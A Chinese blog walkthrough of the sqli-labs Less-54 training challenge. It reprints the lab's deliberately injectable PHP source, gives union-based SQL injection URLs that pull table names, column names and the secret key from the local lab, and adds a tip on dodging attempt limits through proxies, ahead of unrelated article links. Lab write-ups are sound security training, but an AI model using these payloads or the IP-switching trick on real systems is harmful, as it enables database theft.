FLy_鹏程万里
FLy_鹏程万里

sqli-labs————Less-54(第四部分:提高部分)

前言

在接下来的几关中将会对前面所学习的内容做一个复习,同时也会通过在复杂环境中的应用来提高注入技巧。

Less-54

sqli-labs————Less-54(第四部分:提高部分)_第1张图片

源代码:





Less-54:Challenge-1














Welcome    Dhakkan 



You have reset the Challenge
\n";
		echo "Redirecting you to main challenge page..........\n";
		header( "refresh:4;url=../sql-connections/setup-db-challenge.php?id=$pag" );
		//echo "cookie expired";			
	}
	else
	{
		// Checking the cookie on the page and populate the table with random value.
		if(isset($_COOKIE['challenge']))
		{
			$sessid=$_COOKIE['challenge'];
			//echo "Cookie value: ".$sessid;
		}
		else
		{
			$expire = time()+60*60*24*30;
			$hash = data($table,$col);
			setcookie("challenge", $hash, $expire);
			
		}
	
		echo "
\n";
	
		// take the variables
		if(isset($_GET['id']))
		{
			$id=$_GET['id'];
	
			//logging the connection parameters to a file for analysis.
			$fp=fopen('result.txt','a');
			fwrite($fp,'ID:'.$id."\n");
			fclose($fp);
	
			
			//update the counter in database
			next_tryy();
			
			//Display attempts on screen.
			$tryyy = view_attempts();
			echo "You have made : ". $tryyy ." of $times attempts";
			echo "


\n";
		
			
			//Reset the Database if you exceed allowed attempts.
			if($tryyy >= ($times+1))
			{
				setcookie('challenge', ' ', time() - 3600000);
				echo "You have exceeded maximum allowed attempts, Hence Challenge Has Been Reset 
\n";
				echo "Redirecting you to challenge page..........\n";
				header( "refresh:3;url=../sql-connections/setup-db-challenge.php?id=$pag" );
				echo "
\n";
			}		
		
			// Querry DB to get the correct output
			$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
			$result=mysql_query($sql);
			$row = mysql_fetch_array($result);

			if($row)
			{
				echo '';	
				echo 'Your Login name:'. $row['username'];
				echo "
";
				echo 'Your Password:' .$row['password'];
				echo "";
			}
			else 
			{
				echo '';
//				print_r(mysql_error());
				echo "";  
			}
		}
		else
		{
			echo "Please input the ID as parameter with numeric value as done in  Lab excercises\n

\n";
			echo "The objective of this challenge is to dump the (secret key) from only random table from Database ('CHALLENGES') in Less than $times attempts
";
			echo "For fun, with every reset, the challenge spawns random table name, column name, table data. Keeping it fresh at all times.
" ;
		}
	
	}
	

?>
 















Submit Secret Key: 


 




';
	$key = addslashes($_POST['key']);
	$key = mysql_real_escape_string($key);
	//echo $key;
	//Query table to verify your result
	$sql="SELECT 1 FROM $table WHERE $col1= '$key'";
	//echo "$sql";
	$result=mysql_query($sql)or die("error in submittion of Key Solution".mysql_error());
	 
	$row = mysql_fetch_array($result);
	
	if($row)
	{
		echo '';
		echo "\n


";
		echo '';
		echo ""; 
		header( "refresh:4;url=../sql-connections/setup-db-challenge.php?id=$pag" );	
	}
	else 
	{
		echo '';
		echo "\n


";
		echo '';
		header( "refresh:3;url=index.php" );
		//print_r(mysql_error());
		echo "";  
			}	

}

?>

sql执行语句:

$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";

从上面的SQL语句,我们可以知晓这一关是一个字符型注入,但是只能够尝试10次。所以我们要在所给的次数范围之内完成注入。

我们可以看到这里的表名和密码等时每10次尝试之后就会强行更换。

构造一下payload:

http://192.168.11.136/sqli-labs/Less-54?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+

sqli-labs————Less-54(第四部分:提高部分)_第2张图片

得到表名:x8zrbqkd79

之后测试获取列名:

http://192.168.11.136/sqli-labs/Less-54?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='x8zrbqkd79'--+

sqli-labs————Less-54(第四部分:提高部分)_第3张图片

查看列值:

http://192.168.11.136/sqli-labs/Less-54?id=-1'union select 1,2,group_concat(secret_3ZC3) from challenges.x8zrbqkd79 --+

sqli-labs————Less-54(第四部分:提高部分)_第4张图片

之后提交key即可!

sqli-labs————Less-54(第四部分:提高部分)_第5张图片

在实际渗透测试中,我们可以利用更换IP(可以用代理)或者更换浏览器来绕过服务器端的检查限制。对于这个的实现,自己编写脚本是一个不错的选择。

你可能感兴趣的:(【信息安全】,【渗透测试实战1】,———Sqli-labs实战)

  • 从Prompt到结构建模:如何以数据驱动重构日本语言学校体系?以国际日本语学院为例 semantist@语校 语言学校Prompt模板集prompt人工智能数据集github知识图谱数据结构ai
    从Prompt到结构建模:如何以数据驱动重构日本语言学校体系?以国际日本语学院为例系列说明500所日本语言学校结构化建模实战,第8篇。每篇拆解1所学校在Prompt-QA系统中的建模策略,分享工程经验,本项目持续在HuggingFace上同步更新,欢迎AI工程师们关注。语言学校不是黑箱:为何要建模?在日本,每一所语言学校背后都隐藏着复杂的法律结构、招生路径与教学机制。但多数申请者、中介甚至部分行政
  • 深入Python闭包内存泄漏:从原理到实战修复指南 清水白石008 Python题库pythonpython开发语言
    深入Python闭包内存泄漏:从原理到实战修复指南引言:闭包与内存管理的双重挑战在Python编程中,闭包(Closure)作为函数式编程的重要特性,被广泛应用于装饰器、回调函数等场景。然而,当闭包与类实例结合使用时,若处理不当极易引发内存泄漏问题。本文将通过一个典型案例,深入剖析闭包导致内存泄漏的机理,并演示从检测到修复的完整流程,最终提炼出防御性编程的最佳实践。一、内存泄漏闭包案例实录1.1典
  • Python装饰器与闭包:实战应用与深入理解
    背景简介本章深入探讨了Python装饰器与闭包的核心概念,展示了它们在实际编程中的灵活应用和强大功能。装饰器的魔力:保持元数据与链式应用在Python中,装饰器是一种修改或增强函数行为的强大工具,它能够让我们在不改变原始函数代码的情况下,为其添加新功能。保持函数的元数据是装饰器的一个重要特性,它确保了装饰后的函数保持其身份和文档字符串信息。这对于代码的可读性和维护性至关重要。当需要将多个装饰器应用
  • 【实战派×学院派】39|PRD 写得很厚,开发还是一问三不知? 郭菁菁 (BA/PM)实战派常踩的坑学院派如何补上业务分析需求分析BA
    学院派:用三层结构+重点高亮+同步讲解,让PRD真正成为开发读得懂、用得上的交付物。是不是经常遇到这种场景:“PRD我早就发你们了啊!”“里面都有写,麻烦仔细看。”“为啥还来问?你们没看文档吗?”结果,开发开工前依旧一头雾水,连核心流程都没理清楚,PRD反而成了摆设。✅实战派常见误区:文档堆砌当“交付”,缺乏结构化设计实战派做法潜在问题典型后果追求面面俱到信息冗余,缺乏重点开发找不到关键信息全靠自
  • JUC工具类
    在黑马点评项目实战中使用Redis实现全局秒杀的课程中,提到了一个名词JUC,在测试生成随机id的有效性时使用到了JUC的工具类:CountDownLatch,这里简单进行一个介绍和了解,想学习更具体的有关多线程与并发编程的内容,可以去看黑马有专门的JUC教程。一、CountDownLatch:多线程协调工具类CountDownLatch是Java并发包(JUC)中的一个同步辅助类,主要用于协调多
  • python爬虫技术——基础知识、实战 南瓜AI python爬虫scrapy
    参考文献:Python爬虫入门(一)(适合初学者)-CSDN博客一、常用爬虫工具包Scrapy语言:Python特点:高效、灵活的爬虫框架,适合大型爬虫项目。BeautifulSoup语言:Python特点:用于解析HTML和XML,简单易用。Selenium语言:Python/Java/C#特点:支持浏览器自动化,适合处理JavaScript渲染的网页。Requests语言:Python特点:简
  • 程序员的一生:代码、挑战与无限可能 Jay_MIng 开发语言phplinux运维nginxjavapython
    程序员的职业生涯呈现出鲜明的阶段性特征,每个阶段都面临不同的挑战与机遇:成长期(22-30岁):黄金学习期。在这个阶段中的你身体机能处于巅峰,自由时间也充沛,你大多是一个人,没有太多的压力,核心任务是构建技术根基。从学校的书本知识到企业级开发实战的跨越在此阶段完成,需掌握团队协作、版本控制、代码测试等工程化能力。黄金期(30-45岁):上有老下有小的负重攀登期。技术能力达到高峰,却面临家庭责任挤压
  • web前端入门到实战:CSS实现8种炫酷按钮 大前端世界
    今天给大家分享8种炫酷按钮的CSS实现。1.3D按钮1现在的主流是扁平化的设计,拟物化的设计比较少见了,所以我们仅从技术角度去分析如何实现这个3D按钮该按钮的立体效果主要由按钮多出的左、下两个侧面衬托出来,我们可以使用box-shadow模拟出这两个侧面:HTML:3DButton1CSS:.button-3d-1{position:relative;background:orangered;bo
  • 从0到1,带你轻松吃透Scratch编程
    目录一、Scratch是什么二、为什么选择Scratch三、快速上手Scratch(一)界面初相识(二)基础编程概念(三)第一个程序诞生四、深入学习Scratch(一)常用积木块详解(二)变量与数据处理(三)控制结构运用五、实战项目演练(一)简易游戏开发(二)动画制作实战六、学习资源推荐七、总结与展望一、Scratch是什么Scratch是一款由麻省理工学院(MIT)媒体实验室的终身幼儿园团队开发
  • 头歌实践JAVA项目开发实战入门--第10阶段【Linux操作系统】
    开始更新头歌了!!!有需要的小伙伴自取吧;有什么好的建议也可以评论区留言,大家一起共勉!Linux操作系统一、Linux初体验#!/bin/bash#在以下部分写出完成任务的命令#*********begin*********#cd/ls-a#*********end*********#二、Linux常用命令#!/bin/bash#在以下部分写出完成任务的命令#*********begin****
  • 头歌实践Java项目开发入门实战第三阶段【Java高级特性】 Y_03 头歌实践题java开发语言
    本文来自头歌实践平台的Java项目实战入门【只有编程题】,如需访问其他阶段的文章,请自行阅读主页其他文章制作不易,请留下一个免费的点赞以及关注吧!!!一、Java高级特性-IO流2、字节流-输入输出packagestep2;importjava.io.File;importjava.io.FileInputStream;importjava.io.FileOutputStream;importja
  • Arcs 开源项目实战指南 解洲思Ronald
    Arcs开源项目实战指南项目介绍Arcs是一个由MichaelF.Bryan开发的开源项目,旨在解决数据流转和管理方面的问题。尽管详细的项目目标和功能在GitHub页面上可能因时间而异,但从其名称推测,它可能围绕“Arcs”这一概念,提供一种新颖的数据处理框架或服务。Arcs可能旨在简化复杂的数据流逻辑,促进数据在不同应用程序和服务间的高效共享。为了获取最新的项目说明,建议直接访问GitHub仓库
  • 手撕C语言数组:从青铜到王者的逆袭之路!!!
    文章目录一、数组的"出生证明"(超重要!)1.1数组的定义姿势1.2数组初始化の艺术二、数组内存布局大揭秘三、新手必踩的5大深坑(血泪教训)3.1数组越界访问3.2sizeof的陷阱3.3数组赋值妄想症四、高手进阶技巧(秀起来~)4.1动态计算数组长度4.2多维数组の奥义4.3数组与指针的量子纠缠五、实战代码示范5.1数组反转算法5.2数组去重骚操作六、总结与思考天天用数组,你真的了解它吗?这个看
  • PE系统机器视觉实战(直播回放) 遨博学院 机器人竞赛机器人人工智能
    PE系统机器视觉实战本次培训主要围绕视觉与机器人的综合实践展开,重点讲解了视觉标定和机器人通过视觉实现随机抓取的操作流程。以下是详细要点总结:网络配置需配置三个设备:机器人、电脑和相机的IP地址,确保网络互通。机器人IP设为192.168.1.50,电脑为60,相机为70。电脑建议使用有线网卡,关闭防火墙及杀毒软件,避免网络冲突。可通过ping命令测试网络连通性。视觉标定操作使用MVS软件配置相机
  • 文心一言API接入指南:手把手教你快速集成AI能力 AIGC应用创新大全 文心一言人工智能ai
    文心一言API接入指南:手把手教你快速集成AI能力关键词:文心一言API、大模型集成、开发者指南、AI能力调用、API接入实战摘要:本文是面向开发者的文心一言API接入全流程指南,从注册账号到代码调用,用“手把手”式讲解+实战案例,带你快速掌握大模型能力集成方法。无论你是想给产品增加智能对话功能的中小团队,还是想尝试AI开发的个人开发者,读完本文都能轻松上手文心一言API!背景介绍目的和范围近年来
  • 多模态查询优化:5个提升搜索准确率的技巧
    多模态查询优化:5个提升搜索准确率的技巧关键词:多模态搜索、特征融合、跨模态对齐、混合索引、语义增强摘要:本文将揭示5个提升多模态搜索准确率的实用技巧,通过生活化案例和代码示例,带您理解如何让图像、文本、语音等不同模态数据协同工作,构建更智能的搜索引擎。背景介绍目的和范围本文旨在帮助开发者和产品经理理解多模态搜索的核心优化技术。涵盖从基础概念到实战应用的完整知识体系,重点解析5个提升准确率的关键技
  • 操作系统休眠功能的用户体验设计 操作系统内核探秘 ux服务器负载均衡ai
    操作系统休眠功能的用户体验设计关键词:操作系统、休眠功能、用户体验设计、响应速度、能源管理摘要:本文聚焦于操作系统休眠功能的用户体验设计,首先介绍了该设计的背景,涵盖目的、预期读者等内容。接着详细解释了与休眠功能相关的核心概念及其联系,通过生动的比喻让读者轻松理解。阐述了休眠功能背后的核心算法原理和具体操作步骤,给出了数学模型及公式。还通过项目实战展示了代码实现与解读。之后探讨了实际应用场景、推荐
  • 深度剖析AI人工智能领域多模态大模型 AI学长带你学AI AI人工智能与大数据应用开发AI应用开发高级指南人工智能ai
    深度剖析AI人工智能领域多模态大模型关键词:AI人工智能、多模态大模型、模型架构、算法原理、应用场景摘要:本文旨在对AI人工智能领域的多模态大模型进行深度剖析。首先介绍多模态大模型的背景知识,包括目的、预期读者等。接着阐述核心概念,分析其架构和原理,并给出相应的流程图。通过Python代码详细讲解核心算法原理和具体操作步骤,同时用数学模型和公式进一步阐释。在项目实战部分,给出实际案例及详细代码解读
  • 【C语言】从零实现 memcpy:原理、陷阱与实战 BabyZZの秘密日记 C语言c语言开发语言
    个人主页:BabyZZの秘密日记收入专栏:C语言文章目入1.什么是`memcpy`?2.标准库版本示例3.自己写一个`my_memcpy`3.1思路拆解3.2完整实现3.3测试代码4.常见坑&面试追问5.小结本文面向C语言初学者与面试复习人群,通过两个完整示例带你深入理解memcpy的工作机制,并亲手实现一个“简化版”的my_memcpy。阅读时间约5分钟。1.什么是memcpy?memcpy是C
  • Python爬虫实战:研究psd-tools库相关技术 ylfhpy 爬虫项目实战python爬虫开发语言psd-tools
    一、引言1.1研究背景AdobePhotoshop是目前最流行的图像处理软件之一,其原生文件格式PSD(PhotoshopDocument)包含了丰富的图像信息和编辑历史。PSD文件不仅在设计领域广泛使用,还在数字营销、版权保护和安全分析等领域具有重要价值。然而,手动分析大量PSD文件是一项繁琐且耗时的工作,因此开发自动化的PSD文件分析工具具有重要的现实意义。1.2研究目的本文旨在开发一个基于P
  • 【实时Linux实战系列】实时任务与信号处理 望获linux 实时Linux实战系列chromelinux前端开发语言数据库操作系统嵌入式软件
    在实时系统中,信号处理是任务间通信和同步的重要机制之一。信号是一种软件中断,用于在任务之间传递异步事件。实时任务需要能够快速响应信号,以确保系统的实时性和可靠性。掌握信号处理技能对于开发者来说至关重要,它可以帮助开发者设计出更加高效和可靠的实时系统。本文将通过实际案例,详细介绍如何在实时Linux中处理信号,包括信号的基本概念、信号处理机制以及如何在实时任务中有效地使用信号。我们将从基本的信号处理
  • 【C# + HALCON 机器视觉】构建通用视觉软件平台:跨行业应用实战 AI_DL_CODE 机器视觉:C#+HALCONc#HALCON机器视觉通用软件平台二维码识别模板匹配OCR
    摘要:本文深入探讨基于C#与HALCON开发通用视觉软件平台的技术路径与实践方法,围绕二维码识别、OCR、模板匹配等核心功能,结合模块化设计理念,详细阐述相机参数设置、图像处理、通信模块等技术实现。通过与爱普生机器人配合的定位标定案例,以及印刷品缺陷检测、包装日期识别等应用场景,展示该平台在跨行业领域的应用价值,同时提供完整实操流程与代码示例,助力开发者快速搭建高效、低成本的机器视觉解决方案。文章
  • 交互说明撰写案例:从页面结构到动态规则的实战示范 SickeyLee 产品经理prd文档
    交互说明撰写案例:从页面结构到动态规则的实战示范交互说明的价值,最终要通过实际案例来体现。一份好的交互说明,能让开发团队准确理解每个按钮的点击反馈、每个列表的加载逻辑,甚至每个文字的显示规则。本文以一个APP首页为例,详解交互说明的撰写步骤、核心规则和实用技巧,帮你掌握从“页面结构”到“动态交互”的完整撰写方法。一、页面说明:理清结构是基础在撰写交互说明前,首先需要明确页面的整体框架和访问路径,这
  • 【RK3576】【Android14】Android平台构建 Evan_ZGYF丶 androidRK3576Android14驱动开发
    获取更多相关的【RK3576】【Android14】驱动开发,可收藏系列博文,持续更新中:【RK3576】Android14驱动开发实战指南目录简介Android构建设置构建环境lunch选择平台配置关联UBOOT配置关联DTS配置简介Android14源码下载后,通过如下命令编译SDK:sourcebuild/envsetup.shlunchrk3576_u-userdebug./build.s
  • Appium 简介 AIZHINAN appium测试工具自动化测试
    Appium是一个开源的移动应用自动化测试框架,用于测试原生应用(native)、混合应用(hybrid)和移动网页应用(mobileweb)。它支持iOS、Android和Windows平台。https://www.bilibili.com/video/BV1R93szkEhi/?App自动化测试:App测试Appium+UiAutomator2技巧、实战项目核心特点跨平台:同一套API可用于i
  • 高频面试雷区:Java Object六大核心方法源码剖析
    JavaObject核心方法全解:从源码到实战的深度指南在Java开发中,90%的对象操作都离不开Object类的方法,但大多数开发者仅停留在表面理解。本文将深入源码揭示每个方法的底层机制,并通过真实场景展示如何正确使用这些基础但强大的工具。一、Object类全景图:Java对象的基因库Object+wait():void+wait(longtimeout):void+notify():void+
  • 做人事必看的书籍推荐,你看过哪几本? translator
    HR必看的关于人力资源管理的15本书籍,你已经看过几本?1、《人力资源管理必读12篇》作者——信汇中正领导力,推荐理由——《人力资源必读12篇》集结世界顶级人力资源管理大师经典,从激励、员工、薪酬、绩效、组织发展、招聘、培训等面向与模块入手,即充分体现人力资本管理的细枝末节又不失实战高度,帮助企业破除组织人力资源顽疾,让CHO(首席人力资源官)比肩CFO(首席财务官)。2、《第五项修炼》作者——彼
  • Python 机器学习:NumPy 实现朴素贝叶斯分类器 Python编程之道 Python编程之道python机器学习numpyai
    Python机器学习:NumPy实现朴素贝叶斯分类器关键词:朴素贝叶斯分类器、NumPy、机器学习、概率模型、条件概率、拉普拉斯平滑、向量化计算摘要:本文系统讲解朴素贝叶斯分类器的核心原理,基于NumPy实现高效的算法框架,涵盖从概率理论到工程实现的完整流程。通过数学公式推导、代码实现和鸢尾花数据集实战,展示如何利用向量化计算优化概率估计,解决特征独立性假设下的分类问题。同时分析算法优缺点及实际应
  • AIGC革命:基于魔搭社区的LLM应用开发实战——从模型微调到系统部署 Liudef06小白 AIGC人工智能特殊专栏人工智能魔搭AIGCLLM
    AIGC革命:基于魔搭社区的LLM应用开发实战——从模型微调到系统部署1.AIGC技术演进与魔搭社区生态解析人工智能生成内容(AIGC)正在重塑内容创作、软件开发和人机交互的边界。从OpenAI的GPT系列到StabilityAI的StableDiffusion,生成式AI技术正以惊人的速度发展。在这场技术革命中,魔搭社区(ModelScope)作为中国领先的AI模型开源平台,正成为开发者探索AI
  • Python Gradio:快速搭建人脸识别应用 Python编程之道 Python人工智能与大数据Python编程之道python开发语言ai
    PythonGradio:快速搭建人脸识别应用关键词:Python,Gradio,人脸识别,深度学习,计算机视觉,交互式应用,模型部署摘要:本文详细介绍了如何使用Python的Gradio库快速搭建一个交互式的人脸识别应用。我们将从基础概念出发,逐步讲解人脸识别的核心算法原理、Gradio的界面设计方法,并通过完整的项目实战演示如何将深度学习模型部署为可交互的Web应用。文章包含详细的代码实现、数
  • Enum 枚举 120153216 enum枚举
    原文地址:http://www.cnblogs.com/Kavlez/p/4268601.html Enumeration 于Java 1.5增加的enum type...enum type是由一组固定的常量组成的类型,比如四个季节、扑克花色。在出现enum type之前,通常用一组int常量表示枚举类型。比如这样: public static final int APPLE_FUJI = 0
  • Java8简明教程 bijian1013 javajdk1.8
            Java 8已于2014年3月18日正式发布了,新版本带来了诸多改进,包括Lambda表达式、Streams、日期时间API等等。本文就带你领略Java 8的全新特性。  一.允许在接口中有默认方法实现         Java 8 允许我们使用default关键字,为接口声明添
  • Oracle表维护 快速备份删除数据 cuisuqiang oracle索引快速备份删除
    我知道oracle表分区,不过那是数据库设计阶段的事情,目前是远水解不了近渴。 当前的数据库表,要求保留一个月数据,且表存在大量录入更新,不存在程序删除。 为了解决频繁查询和更新的瓶颈,我在oracle内根据需要创建了索引。但是随着数据量的增加,一个半月数据就要超千万,此时就算有索引,对高并发的查询和更新来说,让然有所拖累。 为了解决这个问题,我一般一个月会进行一次数据库维护,主要工作就是备
  • java多态内存分析 麦田的设计者 java内存分析多态原理接口和抽象类
          “  时针如果可以回头,熟悉那张脸,重温嬉戏这乐园,墙壁的松脱涂鸦已经褪色才明白存在的价值归于记忆。街角小店尚存在吗?这大时代会不会牵挂,过去现在花开怎么会等待。       但有种意外不管痛不痛都有伤害,光阴远远离开,那笑声徘徊与脑海。但这一秒可笑不再可爱,当天心
  • Xshell实现Windows上传文件到Linux主机 被触发 windows
    经常有这样的需求,我们在Windows下载的软件包,如何上传到远程Linux主机上?还有如何从Linux主机下载软件包到Windows下;之前我的做法现在看来好笨好繁琐,不过也达到了目的,笨人有本方法嘛; 我是怎么操作的: 1、打开一台本地Linux虚拟机,使用mount 挂载Windows的共享文件夹到Linux上,然后拷贝数据到Linux虚拟机里面;(经常第一步都不顺利,无法挂载Windo
  • 类的加载ClassLoader 肆无忌惮_ ClassLoader
    类加载器ClassLoader是用来将java的类加载到虚拟机中,类加载器负责读取class字节文件到内存中,并将它转为Class的对象(类对象),通过此实例的 newInstance()方法就可以创建出该类的一个对象。   其中重要的方法为findClass(String name)。   如何写一个自己的类加载器呢? 首先写一个便于测试的类Student
  • html5写的玫瑰花 知了ing html5
    <html> <head> <title>I Love You!</title> <meta charset="utf-8" /> </head> <body> <canvas id="c"></canvas>
  • google的ConcurrentLinkedHashmap源代码解析 矮蛋蛋 LRU
    原文地址: http://janeky.iteye.com/blog/1534352 简述 ConcurrentLinkedHashMap 是google团队提供的一个容器。它有什么用呢?其实它本身是对 ConcurrentHashMap的封装,可以用来实现一个基于LRU策略的缓存。详细介绍可以参见 http://code.google.com/p/concurrentlinke
  • webservice获取访问服务的ip地址 alleni123 webservice
    1. 首先注入javax.xml.ws.WebServiceContext, @Resource private WebServiceContext context; 2. 在方法中获取交换请求的对象。 javax.xml.ws.handler.MessageContext mc=context.getMessageContext(); com.sun.net.http
  • 菜鸟的java基础提升之道——————>是否值得拥有 百合不是茶
    1,c++,java是面向对象编程的语言,将万事万物都看成是对象;java做一件事情关注的是人物,java是c++继承过来的,java没有直接更改地址的权限但是可以通过引用来传值操作地址,java也没有c++中繁琐的操作,java以其优越的可移植型,平台的安全型,高效性赢得了广泛的认同,全世界越来越多的人去学习java,我也是其中的一员      java组成:
  • 通过修改Linux服务自动启动指定应用程序 bijian1013 linux
    Linux中修改系统服务的命令是chkconfig (check config),命令的详细解释如下: chkconfig 功能说明:检查,设置系统的各种服务。 语  法:chkconfig [ -- add][ -- del][ -- list][系统服务] 或 chkconfig [ -- level  <</SPAN>
  • spring拦截器的一个简单实例 bijian1013 javaspring拦截器Interceptor
    Purview接口 package aop; public interface Purview { void checkLogin(); } Purview接口的实现类PurviesImpl.java package aop; public class PurviewImpl implements Purview { public void check
  • [Velocity二]自定义Velocity指令 bit1129 velocity
    什么是Velocity指令 在Velocity中,#set,#if, #foreach, #elseif, #parse等,以#开头的称之为指令,Velocity内置的这些指令可以用来做赋值,条件判断,循环控制等脚本语言必备的逻辑控制等语句,Velocity的指令是可扩展的,即用户可以根据实际的需要自定义Velocity指令   自定义指令(Directive)的一般步骤 &nbs
  • 【Hive十】Programming Hive学习笔记 bit1129 programming
    第二章 Getting Started 1.Hive最大的局限性是什么?一是不支持行级别的增删改(insert, delete, update)二是查询性能非常差(基于Hadoop MapReduce),不适合延迟小的交互式任务三是不支持事务2. Hive MetaStore是干什么的?Hive persists table schemas and other system metadata.
  • nginx有选择性进行限制 ronin47 nginx 动静 限制
    http { limit_conn_zone $binary_remote_addr zone=addr:10m; limit_req_zone $binary_remote_addr zone=one:10m rate=5r/s;... server {... location ~.*\.(gif|png|css|js|icon)$ {
  • java-4.-在二元树中找出和为某一值的所有路径 . bylijinnan java
    /* * 0.use a TwoWayLinkedList to store the path.when the node can't be path,you should/can delete it. * 1.curSum==exceptedSum:if the lastNode is TreeNode,printPath();delete the node otherwise
  • Netty学习笔记 bylijinnan javanetty
    本文是阅读以下两篇文章时: http://seeallhearall.blogspot.com/2012/05/netty-tutorial-part-1-introduction-to.html http://seeallhearall.blogspot.com/2012/06/netty-tutorial-part-15-on-channel.html 我的一些笔记 ===
  • js获取项目路径 cngolon js
    //js获取项目根路径,如: http://localhost:8083/uimcardprj function getRootPath(){     //获取当前网址,如: http://localhost:8083/uimcardprj/share/meun.jsp     var curWwwPath=window.document.locati
  • oracle 的性能优化 cuishikuan oracleSQL Server
       在网上搜索了一些Oracle性能优化的文章,为了更加深层次的巩固[边写边记],也为了可以随时查看,所以发表这篇文章。     1.ORACLE采用自下而上的顺序解析WHERE子句,根据这个原理,表之间的连接必须写在其他WHERE条件之前,那些可以过滤掉最大数量记录的条件必须写在WHERE子句的末尾。(这点本人曾经做过实例验证过,的确如此哦!
  • Shell变量和数组使用详解 daizj linuxshell变量数组
    Shell 变量 定义变量时,变量名不加美元符号($,PHP语言中变量需要),如: your_name="w3cschool.cc" 注意,变量名和等号之间不能有空格,这可能和你熟悉的所有编程语言都不一样。同时,变量名的命名须遵循如下规则: 首个字符必须为字母(a-z,A-Z)。 中间不能有空格,可以使用下划线(_)。 不能使用标点符号。 不能使用ba
  • 编程中的一些概念,KISS、DRY、MVC、OOP、REST dcj3sjt126com REST
    KISS、DRY、MVC、OOP、REST (1)KISS是指Keep It Simple,Stupid(摘自wikipedia),指设计时要坚持简约原则,避免不必要的复杂化。 (2)DRY是指Don't Repeat Yourself(摘自wikipedia),特指在程序设计以及计算中避免重复代码,因为这样会降低灵活性、简洁性,并且可能导致代码之间的矛盾。 (3)OOP 即Object-Orie
  • [Android]设置Activity为全屏显示的两种方法 dcj3sjt126com Activity
    1. 方法1:AndroidManifest.xml 里,Activity的 android:theme  指定为" @android:style/Theme.NoTitleBar.Fullscreen" 示例:   <application      
  • solrcloud 部署方式比较 eksliang solrCloud
    solrcloud 的部署其实有两种方式可选,那么我们在实践开发中应该怎样选择呢? 第一种:当启动solr服务器时,内嵌的启动一个Zookeeper服务器,然后将这些内嵌的Zookeeper服务器组成一个集群。  第二种:将Zookeeper服务器独立的配置一个集群,然后将solr交给Zookeeper进行管理   谈谈第一种:每启动一个solr服务器就内嵌的启动一个Zoo
  • Java synchronized关键字详解 gqdy365 synchronized
    转载自:http://www.cnblogs.com/mengdd/archive/2013/02/16/2913806.html 多线程的同步机制对资源进行加锁,使得在同一个时间,只有一个线程可以进行操作,同步用以解决多个线程同时访问时可能出现的问题。 同步机制可以使用synchronized关键字实现。 当synchronized关键字修饰一个方法的时候,该方法叫做同步方法。 当s
  • js实现登录时记住用户名 hw1287789687 记住我记住密码cookie记住用户名记住账号
    在页面中如何获取cookie值呢? 如果是JSP的话,可以通过servlet的对象request 获取cookie,可以 参考:http://hw1287789687.iteye.com/blog/2050040 如果要求登录页面是html呢?html页面中如何获取cookie呢? 直接上代码了 页面:loginInput.html 代码: <!DOCTYPE html PUB
  • 开发者必备的 Chrome 扩展 justjavac chrome
    Firebug:不用多介绍了吧https://chrome.google.com/webstore/detail/bmagokdooijbeehmkpknfglimnifench ChromeSnifferPlus:Chrome 探测器,可以探测正在使用的开源软件或者 js 类库https://chrome.google.com/webstore/detail/chrome-sniffer-pl
  • 算法机试题 李亚飞 java算法机试题
           在面试机试时,遇到一个算法题,当时没能写出来,最后是同学帮忙解决的。        这道题大致意思是:输入一个数,比如4,。这时会输出:           &n
  • 正确配置Linux系统ulimit值 字符串 ulimit
    在Linux下面部 署应用的时候,有时候会遇上Socket/File: Can’t open so many files的问题;这个值也会影响服务器的最大并发数,其实Linux是有文件句柄限制的,而且Linux默认不是很高,一般都是1024,生产服务器用 其实很容易就达到这个数量。下面说的是,如何通过正解配置来改正这个系统默认值。因为这个问题是我配置Nginx+php5时遇到了,所以我将这篇归纳进
  • hibernate调用返回游标的存储过程 Supanccy2013 javaDAOoracleHibernatejdbc
    注:原创作品,转载请注明出处。     上篇博文介绍的是hibernate调用返回单值的存储过程,本片博文说的是hibernate调用返回游标的存储过程。     此此扁博文的存储过程的功能相当于是jdbc调用select 的作用。 1,创建oracle中的包,并在该包中创建的游标类型。 ---创建oracle的程
  • Spring 4.2新特性-更简单的Application Event wiselyman application
    1.1 Application Event Spring 4.1的写法请参考10点睛Spring4.1-Application Event 请对比10点睛Spring4.1-Application Event 使用一个@EventListener取代了实现ApplicationListener接口,使耦合度降低; 1.2 示例 包依赖 <p
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他